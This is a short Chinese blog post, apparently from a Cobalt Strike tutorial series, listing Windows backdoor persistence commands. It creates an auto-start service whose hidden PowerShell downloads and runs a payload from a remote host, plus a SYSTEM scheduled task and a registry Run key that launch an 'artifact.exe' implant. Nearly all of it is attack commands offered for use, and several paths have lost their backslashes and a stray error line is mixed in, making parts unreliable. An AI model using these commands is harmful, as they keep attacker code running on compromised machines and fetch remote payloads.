1.服务自动启动

sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(' http://192.168.0.150:80/a'))""

sc config "Windows Power" start= auto

sc description "Windows Power" "windows auto service"

net start "Windows Power"

sc delete "Windows Power"

sc create "server power" binpath= "C:UsersAdministratorDesktopartifact.exe"

sc description "server power" "description" 设置服务的描述字符串

sc config "server power" start= auto 设置这个服务为自动启动

net start "server power" 启动服务

2.计划任务

创建任务

schtasks /create /tn "windowsup" /tr "C:artifact.exe" /ru SYSTEM /sc onstart

删除任务

schtasks /delete /tn windowsup

查询任务

chcp 437错误: 无法加载列资源。

s 请修改字符集

schtasks /query /tn windowsup

手工运行任务

schtasks /run /tn windowsup

3.注册表启动

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:artifact.exe" /f

最后

以上就是雪白黄豆最近收集整理的关于Cobalt Strike（十八）可持续后门的使用1.服务自动启动2.计划任务3.注册表启动的全部内容，更多相关Cobalt内容请搜索靠谱客的其他文章。